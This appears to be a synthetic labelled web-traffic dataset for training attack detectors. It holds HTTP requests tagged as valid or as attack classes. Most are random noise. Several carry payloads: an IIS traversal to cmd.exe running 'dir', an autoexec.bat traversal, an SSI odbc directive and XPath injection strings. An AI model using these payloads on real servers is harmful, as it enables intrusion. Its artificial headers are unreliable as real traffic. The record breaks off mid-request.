GET /28co/m2y4cdtaPiutCcwa3/nF5v_u_y_9zN@N/Ueo/rqBuvUDrWThk4sN/6et7Aheumd/04pZiqSK5I/wHWI3dB_ggiX/OaanoOCorqpz/tWnX7rmxCan/sGhY.XE/linkM3e-uRLWH.htm?GiBGRr=%29l&toheihe3=c%5C&ivpasswd4=9250&tneE=nswgetnevtinlikeqer%5Csc&x2e6=590&dropReV8xpugroup byE79=94748&vitpysttNzdmo=ce7rs&jnSoeoadQiapeo=jahbnj+reeoitAi HTTP/1.1
Host: 216.136.95.185
Connection: close
Accept: application/zip;q=0.7, text/xml;q=0.8, text/*;q=0.5
Accept-Charset: shift_jis;q=0.7, iso-8859-4;q=0.0, x-mac-ce;q=0.0, macintosh;q=0.9, windows-1253;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 157.236.53.20
Cookie: eplnualj14uromr=280;.87oVJu=dYW90__vg;onmge= (;Q0olNQincludeWlry1=8035313
Cookie2: $Version="775"
Date: Sat, 26 Sep 09 06:22:50 UTC
ETag: W/"pF1hoZqJJyoHn89W9VH"
Expect: 100-continue
From: sliheOFe@oSenphus.it
If-Modified-Since: Mon, 10 May 04 21:27:31 CET
If-Unmodified-Since: Mon, 24 Jul 06 10:22:16 CET
If-Match: "ZIPouwR1Wkh3S-dUp"
If-None-Match: *
If-Range: Tue, 23 Dec 08 02:30:44 CET
Max-Forwards: 4
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic d0NpYjlsZTo2b2dxbnRl
Authorization: suela 6evhU=rEewqr
Range: -8,9401-9800,-599
Referer: /elAsc/EEa1/hhFqevi.mpeg
TE: trailers
Trailer: Accept-Encoding
User-Agent: mrerAeg (tSpj0.@8; tsnEbW.; pw_IO-_2sY)
UA-CPU: PowerPC
UA-Disp: 2183,5316,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 4348x363
Via: deNh/4.3 96.38.200.29, 2.1 www.ovoet.tiff, FTP/3.8 86.139.154.102
Transfer-Encoding: HacW; 3cliD0=sih8Oa
Upgrade: fr1/3.0
Warning: 335 124.7.71.254:492 "wCaa" 
X-Forwarded-For: 204.164.3.151
X-Serial-Number: 539815603365
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1930
Start - Id: 19733
class: Valid
GET /t.0P-_SautoexecObj@g/eeaNvPjbGPeeoe5i/pepetijsax/eTUCi6E9kRiS9T1UU.html?mfmmihwatDd=m6&flBZAL8AoiZ=e&n3le9ried8smpvj=Mit&snSS=s3ar&frhh5trvsratt=syfsu9stO&lesi=h7oametaNhhS&ettaoanmiiN=fJkUv&ts=byeef&87on=ao%3F&ohlq=4eusam&lewpthgpeoay3g=cxid&ottehregurseuii=l%27o+&aTni=tneojmfntmssse&rruAe=EmsnodTop HTTP/1.0
Host: 233.118.245.104:3622
Connection: Ernvm
Accept: application/zip, text/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=0
Client-ip: 125.18.9.170
Cookie: 0catxA=7]>;rautH=59740;rEe=Jhaving
Cookie2: $Version="96"
Date: Mon, 30 Apr 07 05:21:45 GMT
ETag: "9Eu4dPdUshDtjLUn-g1z"
Expect: gcbr
From: Soneyf@vxodosnt.net
If-Modified-Since: Sat, 03 Mar 07 09:05:57 UTC
If-Unmodified-Since: Mon, 01 Mar 04 19:21:23 GMT
If-Match: *
If-None-Match: *
If-Range: "HVEWag@mfG@QVdW"
Max-Forwards: 2
MIME-Version: 8.6
Pragma: ry=eaes
Proxy-Authorization: NTLM aWVyN3VzaG8wbmhjaGNhb214SW9uN2FldHMzTWl0c2RvYW4ya2lIcGQ=
Authorization: NTLM aHN0TTllZGVvdGdjODhhYXJvbnRiYnNzSHlFcGVjb2Nh
Range: 4774-
Referer: /totor5e.pdf
TE: gzip;q=0.6,trailers,gzip;q=0.6
Trailer: Max-Forwards
User-Agent: xK2HvcypFe http://www.oOarr.gov
UA-CPU: PowerPC
UA-Disp: 666,3443,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5028x203
Via: 5.5 21.191.219.210:44
Transfer-Encoding: identity
Upgrade: onsjt/4.9
Warning: 577 www.soDnr.shtml "epcbtilItta9ssLe" 
X-Forwarded-For: 43.198.16.171
X-Serial-Number: 465640999525707
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19733
Start - Id: 45754
class: PathTransversal
GET /iunnsCe2wxk/tjO_ams/6ZArYR-ffMofqujAI.u/uvexouar/eB.dll?cJls.k.J2yhttpsuc=bYHAL&67=hRMyo_&Meustdins=an&ed=t0yrewindow.openjn&b90ee=1225&oroa=u%3A%5Cautoexec.bat&zOnta=wmuuqci5hsh&3tasl6kolalo=dEryngs&ynagethoyE=euai&tpittmne6sb=533550 HTTP/1.0
Host: 85.204.216.68
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce, iso-8859-1;q=0.2, cp-950;q=0.6, windows-1253, us-ascii;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: fnioie-ei1smnE
Cache-Control: los='uuioojin'
Client-ip: 18.179.14.242
Cookie: jh0eoorbxu=3
Cookie2: $Version="51"
Date: Tue, 25 Dec 07 16:54:21 CET
ETag: "NdluKyEsbt3wqR6uNr"
Expect: 100-continue
From: nbuYYe@rnspS.ch
If-Modified-Since: Fri, 07 Oct 05 12:53:03 UTC
If-Unmodified-Since: Fri, 13 May 05 09:30:20 UTC
If-Match: *
If-None-Match: "0wyDUnO7Su37hLVaUyh"
If-Range: *
Max-Forwards: 956
MIME-Version: 3.0
Pragma: s=lnv
Proxy-Authorization: Digest response="a3eEBd48f4d2C0994e6A30104B6a6Ecf"
Authorization: Digest response="094fe2ECEd1ec8875845BBFbA6Aae73d"
Range: -500252,934-3694
Referer: /wfoi/ewnn7esc/Gboeiz/eHom5etk.fgf
TE: chunked,trailers,deflate;q=0.7
Trailer: Range
User-Agent: Mozilla/8.4 (Windows; U; Windows NT 4.8; Ri-re; rv:3.7.1) Gecko/01232228
UA-CPU: StrongARM
UA-Disp: 0244,7553,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 337x559
Via: saehs/0.0 www.fcaW2ptt.shtml:909
Transfer-Encoding: 3Epmo
Upgrade: aGdne/3.3, slrmIL/7.0, hsea/2.9, wrhit/9.0
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 156.175.229.133
X-Serial-Number: 522078018626
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45754
Start - Id: 43897
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 213.168.108.233
Connection: FOAoeoi
Accept: video/*;q=0.7, text/*, application/postscript
Accept-Charset: x-mac-greek, iso-2022-kr
Accept-Encoding: 
Accept-Language: ip1iS-9m, 0eo-gdescEiw;q=0.4, jonod-8ote;q=0.7, t-eN5duht;q=0.6
Cache-Control: min-fresh=72674
Client-ip: 132.194.132.1
Cookie: iauZteY6q=886;he=dw6raatNb;pgyetteqaf3r6=r1~at;0otndXotbOw=8itslws4;oqeaoo8=8612357245
Cookie2: $Version="6"
Date: Sat, 28 Aug 04 08:00:23 CET
ETag: "Ep17MfiXz7naL9aGqdZ"
Expect: 100-continue
From: pni8hEt@brlOo.ch
If-Modified-Since: Tue, 13 Apr 04 08:25:18 GMT
If-Unmodified-Since: Sun, 18 Apr 10 10:00:58 GMT
If-Match: *
If-None-Match: "YPxlz7._xFR2j-Bam"
If-Range: "2tqlO7hzTvEd9x3Owg8"
Max-Forwards: 1
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM dGxFdHRpbnNuZXRwZmlwU2NjcGVucmk5bWFkbXFhbGhlb2FmZQ==
Authorization: P6xano coke=eW4hee
Range: 3121-127,822-
Referer: http://heR0lnei.cz/hzrll7n.mdb
TE: chunked;q=0.2,chunked;q=0.2,gzip
Trailer: If-Match
User-Agent: Mozilla/2.5 (X11; U; Linux i386 3.0; sr-sb; rv:5.8.0) Gecko/49932870
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 349x5070
Via: 9.0 239.185.121.92:97478
Transfer-Encoding: identity
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 76.128.111.137
X-Serial-Number: 83787585359566262
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43897
Start - Id: 17033
class: Valid
GET /ennYsCshtuiosdd7suey/jtaw/hvpzm3M/nQX1iZvuQ6b6M/ihamnNumeothibbkOKp/c2adcsdE/1Xy/HfxB9.js?temrertticim=NprleXnitieu1ses&senauyil=ntel&9earoutiOD6e=%28&8dnrro2csm=569393&nogblaoe6et=s4jw%40M.THDO9&vhyl.=erttoces&_atzSYkc=9249&ledlaneu8hso=laaUsopenhetl4tt%24wjn&E2i=c+%5CmTs-n%5Cn%5BpositionE HTTP/1.0
Host: 88.91.211.54
Connection: close
Accept: application/rtf;q=0.2, text/*
Accept-Charset: iso-8859-2, euc-jp;q=0.4, iso-2022-jp;q=0.8, windows-1258, iso-8859-4
Accept-Encoding: identity;q=0.7, identity, gzip;q=0.2, compress;q=0.8, compress
Accept-Language: m8E-sb, esCu0-bf8hwe
Cache-Control: no-cache
Client-ip: 35.215.67.128
Cookie: l5za=ceddc;crhacbne=pemwiuhtu;aoctffa=xiHreplace7eooco;Dt3igO3wnypei=712095
Cookie2: $Version="8"
Date: Fri, 01 Sep 06 23:47:34 CET
ETag: W/"mbM4Q5pZuXGEl0e.UYh"
Expect: zw6kS
From: eantepT@rlieozah.gov
If-Modified-Since: Mon, 15 Aug 05 18:56:58 UTC
If-Unmodified-Since: Fri, 04 Aug 06 20:05:26 GMT
If-Match: "d_FfbvrMZHniE8t"
If-None-Match: "3S@rcLtS4hhiDcI4"
If-Range: Sat, 02 Jan 10 12:53:30 GMT
Max-Forwards: 88
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: etoT lefruaR=btta3nc
Authorization: Basic ZEVzbzhpOmZub3I=
Range: 89911-8,-322138
Referer: /ipstelk/Arrf/rnHdicio/rnyazbb/94aarua.avi
TE: trailers,deflate,trailers
Trailer: Accept
User-Agent: DerXdjYlsw (dWVFo2hi)
UA-CPU: PowerPC
UA-Disp: 7236,439,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 486x328
Via: 6.9 www.hlarS.htm
Transfer-Encoding: deflate
Upgrade: 2dsxif/4.8, DkeRu/7.0, doebe/0.4, thiwnu/1.1
Warning: 315 12.241.17.56 "nrSnhri22eTkgrrM" 
X-Forwarded-For: 3.82.91.139
X-Serial-Number: 8231081
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17033
Start - Id: 17418
class: Valid
GET /i@b0U_/s1b8EKJHsS/gedaezir.nsf?n8Mstn=347&oehluIces=mdli3NeeceodeleteFoh%3Ahs6j&fontThcs2tejoKn=10&1eteeaiil=Iss&0ace4aela7=Srrdivaccess_log HTTP/1.1
Host: 243.38.198.243:967
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Sereti-sne;q=0.1, D8tea-0
Cache-Control: min-fresh=84638
Client-ip: 80.246.163.235
Cookie: wp-5FTncz_6d=0860;setUhr2yb=3126651828;hierfwad7ggIiet=u9QTyrA4;oavi7anahpxf=aht;Ettteeau;heinnHD2heir=925757
Cookie2: $Version="106"
Date: Sun, 02 Nov 08 22:20:20 CET
ETag: W/"-SFr4.3pULWs9tuWYV"
Expect: azjs0
From: ttdntmte@un8ztuz.it
If-Modified-Since: Sat, 05 Dec 09 15:47:37 GMT
If-Unmodified-Since: Wed, 27 Jul 05 02:51:53 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 03 Jun 05 03:06:38 UTC
Max-Forwards: 86
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic ZGVDb09pMDplbmRnY3Q=
Authorization: hotdEa strxEfo6=sbjttcs
Range: -29
Referer: http://www.s0Mrshz.st/ciyytaac/celt/u0j45rr/em2m/iaidayi.js
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/0.9 (Machintosh; U; Mac OS X 3.2; kt-dN; rv:6.8.6) Gecko/22959679
UA-CPU: 68000
UA-Disp: 113,258,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 429x433
Via: FTP/2.9 235.204.224.79, FTP/9.9 www.Tmubdbee.css, 7.1 www.p1lew4.css
Transfer-Encoding: deflate
Upgrade: IoLudo/1.8, eemrri/8.1, aol/1.5
Warning: 682 www.8mri.png "1onheHntbcn" "Fri, 11 Dec 09 19:10:46 CET"
X-Forwarded-For: 145.13.88.62
X-Serial-Number: 29354
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17418
Start - Id: 33892
class: Valid
PUT /Jsock_stream2sCVoO/2NjJh0YoQzF/hRq2asYCl4EmBMbn/eap0inpc/ROrKOh/o7_@vlmB68as2/rad1bsfeAn0/niartelune/-V/ah9/b@.nsf? HTTP/1.0
Content-Length: 263
Content-Language: 7che,inemLeda,ne0yenUi
Content-Encoding: gzip
Content-Location: http://www.rmnojo.it/0egesb1N/2uo6e5mm.swf
Content-MD5: cm9Jbjluc29wQWN1aXl0Yg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Sep 07 09:30:54 CET
Last-Modified: Sat, 28 Apr 07 16:35:06 UTC
Host: 100.198.44.204
Connection: close
Accept: video/mpeg, video/mpeg;q=0.3
Accept-Charset: *
Accept-Encoding: compress;q=0.4, compress, deflate, gzip;q=0.0
Accept-Language: *;q=0.4
Cache-Control: min-fresh=76
Client-ip: 163.235.212.144
Cookie: d4Eaa=oKabjTZ5n;1varexec07iwp-2FRH=xfo5n;nym=602462101
Cookie2: $Version="187"
Date: Sat, 02 Dec 06 22:53:59 CET
ETag: W/"bFnz7ddaqy.0cE1"
Expect: 100-continue
From: tietc@t0ytt.net
If-Modified-Since: Wed, 05 Mar 08 01:19:20 UTC
If-Unmodified-Since: Mon, 27 Sep 04 06:36:01 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9739
MIME-Version: 1.6
Pragma: pemiEset=v
Proxy-Authorization: Digest username="3htdpnp1"
Authorization: les4s rtcIc=tswor
Range: 254982-39
Referer: http://botda.fr/NttZ5/oraw/rceTRAee.tiff
TE: trailers,trailers
Trailer: Warning
User-Agent: uOrZPEum.C http://www.Eavf3tp.be
UA-CPU: PowerPC
UA-Disp: 4653,644,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1982x002
Via: 9.4 86.200.100.17:70187
Transfer-Encoding: identity
Upgrade: ict/4.3, tseu/9.1, eolz/4.5, eeiuje/9.5
Warning: 650 www.SRhlh0nf.jpeg "naorss8mXmrab" "Sat, 28 Mar 09 21:13:32 GMT"
X-Forwarded-For: 197.252.39.199
X-Serial-Number: 6132370347859311136
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

brecaurepdet=cCs&A5XU1kR=t5&igaTawtc=au1?8s hfromiS]&anePxatrk4sts=I3ow&tisleiRrar=Yfsgbpassthrueztheexecl%$m;3&ebmi=npso&sr2ch03bv0asRd=cjyhtesina&5lcttdthlsPl=Tetcmmehsa&fl=oHiat78g(meek&AO7r07=eeaoih&-execd2@2CZy=337&2ntamno4eufh=eFEtpeep72ascLyulT

End - Id: 33892
Start - Id: 28887
class: Valid
GET /0faleyree/uI/tahie.shtml? HTTP/1.0
Host: www.ezccml.ch:80
Connection: teatrr
Accept: application/*;q=0.5, video/quicktime;q=0.6
Accept-Charset: cp-932;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: t9s-oisspf6o;q=0.3, ef1e-2quItsm;q=0.2, qeIr-esirw
Cache-Control: no-store
Client-ip: 77.4.9.206
Cookie: wnme= rcsea8 d(iElink&;ho=sttL1es7rDhh;bxo3ux1aeydo=89513397;kgOGzeAz.r=P1e0t;oRrr=s3of5mL3hhnnaa;ptismeits76t=b 
Cookie2: $Version="8"
Date: Wed, 31 May 06 02:25:00 UTC
ETag: W/"08OfWCGUYYg7aGs_@hp"
Expect: yeRBszr
From: 4zbw@syof.net
If-Modified-Since: Sat, 13 Mar 04 23:36:35 GMT
If-Unmodified-Since: Fri, 26 Feb 10 01:43:08 UTC
If-Match: *
If-None-Match: "dgWJ8McAp0y4mx0"
If-Range: *
Max-Forwards: 82
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: hkevoq eMtak=rbi6ts
Range: 0-78,-19014
Referer: /etm1n/oaye/As9hstx/Ornz.mspx
TE: deflate,chunked,chunked;q=0.7
Trailer: If-None-Match
User-Agent: aamhsdUetle
UA-CPU: x86
UA-Disp: 647,902,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 122x5513
Via: 2.6 9.97.32.7, rcys/2.2 146.91.150.243, HTTP/5.7 74.209.74.51:0
Transfer-Encoding: deflate
Upgrade: sippk/3.0, sieesd/6.3, eUhlW/5.4, r57ml/6.9, oriie/9.1
Warning: 683 133.125.37.48 "2t0sroNh62q" 
X-Forwarded-For: 160.62.173.241
X-Serial-Number: 687925565922143
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28887
Start - Id: 40953
class: SSI
PUT /hFlZY6/0204kMZF8AaVcVtk3e/edddtriW0/aVlL8Vv/IdtGrfhdgn.html? HTTP/1.1
Content-Length: 244
Content-Language: ehi9rsd
Content-Encoding: deflate
Content-Location: http://dcoprui.biz/MsfH/8nrat/t8eD2en/0hnjii.asmx
Content-MD5: ZWV0aE9tZWhzaHlwYTlyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Apr 07 17:50:39 GMT
Last-Modified: Mon, 27 Oct 08 16:51:40 GMT
Host: 152.115.48.196:80
Connection: wrs6
Accept: */*
Accept-Charset: windows-1251
Accept-Encoding: 
Accept-Language: tn2ait-asdns
Cache-Control: cAto7ahc='touvtf'
Client-ip: 19.184.214.64
Cookie: zEpsock_stream=le;ona=4
Date: Mon, 02 Oct 06 17:35:38 CET
ETag: W/"e7Krdv@marjOOML46G."
Expect: 6rheoiee
If-Modified-Since: Mon, 12 Feb 07 18:24:53 UTC
If-Match: "tO4-HP2OMoDjwpgdA"
If-None-Match: "SyRL2NMnzGReLz9rRS"
If-Range: Thu, 15 Mar 07 21:53:46 CET
Max-Forwards: 137
Pragma: ylb=ANc
Proxy-Authorization: Digest cnonce="ra0aep"
Authorization: aNmQs utErsa=ltasel
Range: 133-69,171735-0,729-
Referer: http://HiroiC4.gov/aienrM/joie/4noIener/hs0ihl4e.tiff
TE: deflate
User-Agent: <!--#odbc  connect="ebwe,jio,uis"     statement="select  *  from  jht"-->
UA-CPU: 68000
UA-Disp: 816,120,32
Via: 8.7 www.Eio3ev.js, cEsee/1.7 94.130.43.10
Transfer-Encoding: deflate
X-Forwarded-For: 74.151.64.212
----: ------------------------------

lojh1oae=I?d0\ssystematm2ontdelete irta&im=|ylr/r7wo&8zmha9rjee03qi=eV4C&toaaEeu=3693370&ee3e=>&sx=uJE&oe=wmt D&terh=mhbTtpo3Lien&sehmtEentw=047636&qga=n&tPYK_=ifBR&NgrltJ5=gu&sotlE=IelearbtoteMa&0t7huhT6e=e-&12orimyathzo7l=0578128113

End - Id: 40953
Start - Id: 35892
class: XPathInjection
POST /y0d8n/h9Cl6D2JkXcsOey2vn/pFfu/3olknlL8oyinrb5/BvyF6HiCr/eag-/br2hglsgso/evkchcT/DvAf.exe? HTTP/1.0
Content-Length: 224
Content-Language: n1tbrzh,ivae,dni
Content-Encoding: gzip
Content-MD5: dGNzc0tlNmVwYWVhaXdhbA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Oct 05 13:24:16 CET
Last-Modified: Mon, 30 Apr 07 14:28:55 UTC
Host: 46.4.234.24
Connection: keep-alive
Accept: text/*;q=0.0
Accept-Charset: *
Accept-Encoding: ngope'   or  6 < count(path/child::*) or   'etrhS5es' =    '
Accept-Language: agqE/dh/s/child::node()[ position()=893]    |   se/uogT/eme/child::text()[position()=712]   or '2Ncw'    = '
Cache-Control: rdyo=s75cmhi7
Cookie: GXu_.IpSE=lr4n  ;tneek4nkaOe=ttesleria6;xh8vJ-=mvemeePae
Date: Tue, 29 Nov 05 01:08:06 CET
If-Modified-Since: Fri, 18 Jul 08 09:29:54 GMT
If-Unmodified-Since: Sat, 07 Aug 04 06:00:01 GMT
If-Match: "Vq_r.@7Bdl2zK5pJ4lT"
If-None-Match: "ZaxxrDAR3zz8WpFZ4kB@"
If-Range: *
Max-Forwards: 2
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic aG9zbnRxOmhlamFhZW4=
Range: -23690,93-568748,-273092
Referer: http://www.htnmcye.be/Sssdg/CesNc/pdjohIW.htm
User-Agent: ao4ctaocchdoin0s
UA-CPU: PowerPC
Transfer-Encoding: aee9h; esoTWees=punSs3o
Upgrade: isre/2.5, fTav/7.2, rrvnwi/3.7, gsd/4.7
Warning: 657 191.154.129.185 "iulzyysenebtiTitMaMp" "Thu, 11 Jan 07 02:56:56 UTC"
X-Serial-Number: 503350081562336
----: -------------

R@8U_pdxr=qhcVEbsWcGEt&aM7zsa=Y?&eih6th1aVes==h41a<u&alink;passthruh\et&myolesooNadn=4dkIat i E&BMks=3696563632&pyeetgaHgsi=Ys=r&yejdoviadoGoebu=6616&m6tn6Ucvoxfa=joE&3atUyiy8coda=50026741&sreErvnshddstdu=cEigi

End - Id: 35892
Start - Id: 11109
class: Valid
GET /s@exsW0H3ktC/aasnyzTatmyf9t/mD8DwinntJaprocessing-instructiontkhome2/pSH/J9r8passthruQe-K9J.5G/6NsitsaHdegdca/feiaeeAr5verfolhpi/cbnwlatnnzrseec/9ORHEa5AQNHZ/ztelnetmuF1malln/dTmUW39_aAqejrRx/S@QklpI2DNxp_3.tiff?dD=rcm&y4tu7nsDAtujdi=740626577&gj=wepad&swN0u8Mhhln=3360450&iue3tpNbr=3722&dstltfan9hsNe=Ge+ore%5C3UzDl&tar=920450651&igroup bystdinSu8fNuEr=2391320&Fexec8u=homefutdrop&paaont1aibtem5E=ha&tHccyovknt=74718321&gGxtermuautoexecs=6763 HTTP/1.0
Host: www.cr3hbm.ch
Connection: eancSLn
Accept: */*;q=0.7
Accept-Charset: hz-gb-2312;q=0.5, windows-1251
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=1
Client-ip: 200.145.103.183
Cookie: T0dupdateechoopt=8;ayasoeniajn=27;oR2reelueooewSG=yecrftpet8bgsound';6NSJ@Bexec.H=phz
Cookie2: $Version="586"
Date: Mon, 07 Mar 05 17:13:18 GMT
ETag: "FVXUz-zBrhGwRTnn"
Expect: 100-continue
From: lQbqTa@Erdtpio.net
If-Modified-Since: Wed, 06 Jun 07 06:54:00 GMT
If-Unmodified-Since: Sat, 21 Oct 06 07:50:15 GMT
If-Match: "ZNf1GKrRgJ15BEde"
If-None-Match: *
If-Range: *
Max-Forwards: 112
MIME-Version: 0.1
Pragma: esrdonre='ltsG'
Proxy-Authorization: Basic YW91cjpzY3Ni
Authorization: amitk ne2iTaL=rHsy
Range: 7-30,-07477
Referer: http://www.dAgel.de/cxeun/Wmwmoew/td6it/mRrsd.fgf
TE: trailers,gzip;q=0.2
Trailer: TE
User-Agent: Mozilla/7.3 (X11; U; Linux i586 7.8; jo-gK; rv:4.3.1) Gecko/80588918
UA-CPU: 68000
UA-Disp: 4844,042,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 4624x463
Via: 2.7 214.80.6.176, FTP/8.5 145.206.108.188:440, 6.9 www.ota5erwb.htm:62
Transfer-Encoding: iaAlna; hhe68=0osba
Upgrade: o8vl/4.6, Atc/0.7, otrzb/7.6
Warning: 890 225.36.216.127 "thcgttar0olaoaknweu" 
X-Forwarded-For: 199.237.53.206
X-Serial-Number: 96723
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11109
Start - Id: 19249
class: Valid
GET /toitrhvtUz/dHooto/r9/xTK/dheayv/thchlinkvarkF-de/2_mGfSPpUUBX.gif?O@FGx.=99833&NjZh40xIQmi=395 HTTP/1.0
Host: www.Mffgehetc.fr
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.3, utf-7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 65.155.195.133
Cookie: aeers=UgajcUegshprruys;totenta2=l2dtEStmpnRto6
Cookie2: $Version="1"
Date: Tue, 12 Apr 05 09:27:03 GMT
ETag: "NyMSv1vENSzhUG6k"
Expect: ere5h
From: eihFze1l@giUuEnH.gov
If-Modified-Since: Fri, 21 Mar 08 01:26:55 CET
If-Unmodified-Since: Fri, 25 Apr 08 12:25:12 CET
If-Match: *
If-None-Match: "zHHApVuIN-gX8bT"
If-Range: "JZ4bg_c85dlV0F26cfG"
Max-Forwards: 3014
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic cG5ucnlsOmV3ZXNlY2Fp
Authorization: Digest username="TkhsbnTs"
Range: 775-30401,2-
Referer: /eitInr/na85nue/bd7eEtat/tset/nerdean.jpg
TE: trailers,deflate
Trailer: Proxy-Authorization
User-Agent: eZa7hcska4sAnfiik
UA-CPU: x86
UA-Disp: 273,4092,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7913x3682
Via: 3.0 76.184.237.237, 9.3 152.113.3.199
Transfer-Encoding: eC5A; let9gan=alpnr
Upgrade: hi5nal/8.0, hn5t/9.2, ykhito/3.3, 43fett/7.0, nnahn/6.1
Warning: 703 192.57.185.155 "qHwmeihaet" "Sat, 24 Apr 10 16:12:15 UTC"
X-Forwarded-For: 144.205.1.122
X-Serial-Number: 344513341459815545
----: --------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 19249
Start - Id: 35644
class: XPathInjection
GET /n8Iht/_ahomekyGSs/ranti1str/b0ni/scnwa/reodReedcoT82rdwspc/n.9gYSZ1QasJiTg.mspx?cSa=oIa%29u&w4=4099&Ioe6bi=39915&whnl=eb3%2FThtva%2Femd%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D066%5D++%7C++++npyele%2F9%2Fxdsp2A%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D015%5D+or+++%27ts%27++++%3D+++%27&7tYscriptwuFFRu6=gel3edeefryrd&qukgsaddNe=yw&tmI=%3Csacevarsrfa%5Dehaa HTTP/1.0
Host: 115.80.193.96
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-age=94085
Client-ip: 26.104.226.226
Cookie: nrtfeefbeg=7ott2;0vpmohriE=hpet@;iprenerywn=trme1h;iq5i840YbtiwraI=lG_w_2g
Cookie2: $Version="640"
Date: Sat, 20 Mar 04 13:26:05 UTC
ETag: "M3ZVH_ldXyZcfC-"
Expect: linOta
From: esirPUo@ltaa.cz
If-Modified-Since: Mon, 12 Sep 05 21:13:01 CET
If-Unmodified-Since: Mon, 26 Apr 04 05:59:25 GMT
If-Match: *
If-None-Match: "jyXh9uV8U_znHt9idY"
If-Range: "zkWc-tc057oKfpcTNgq"
Max-Forwards: 4748
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: Digest username="Uharo1"
Range: -38,162-85,-031
Referer: /upn0/dovai6p/osLnwdu/rrq5em.mp3
TE: trailers
Trailer: Range
User-Agent: Mozilla/4.8 (X11; U; Open BSD i586 9.4; cn-m3; rv:6.5.3) Gecko/12439718
UA-CPU: StrongARM
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3327x2128
Via: FTP/0.5 97.30.225.2, 6.5 172.11.158.37, ensI/7.8 133.101.159.92:50980
Transfer-Encoding: identity
Upgrade: hag/9.9, hIn/5.9
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 587545
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35644
Start - Id: 14621
class: Valid
GET /dlt341nutfld/eni/mmIw4wAQpRB57w/81ah2sa4rut4n/ajicel7oy/tEio/aresajhT7tdoa9/n3iu0CTicmcLbEVP/P-R/mZ32@.UkCT/jrZfhexj@62VrVG.png? HTTP/1.0
Host: 246.25.210.73
Connection: GSszf
Accept: image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-age=0507
Client-ip: 238.75.53.47
Cookie: M32Drnau=oiyni;cAesyhfjvs=dx1zO;Rdohed=881;nrxdryace1rea=rinsert3ov1wr;dhsAh1wnrsitgtl=)pUnetcattEroj
Cookie2: $Version="53"
Date: Fri, 04 Dec 09 04:46:18 UTC
ETag: W/"bSZN.hzV37mupqiLdQN"
Expect: sshqti
From: uneUynt@llT9mrd0ie.uk
If-Modified-Since: Wed, 18 Feb 04 22:35:55 GMT
If-Unmodified-Since: Sat, 15 Nov 08 12:24:15 UTC
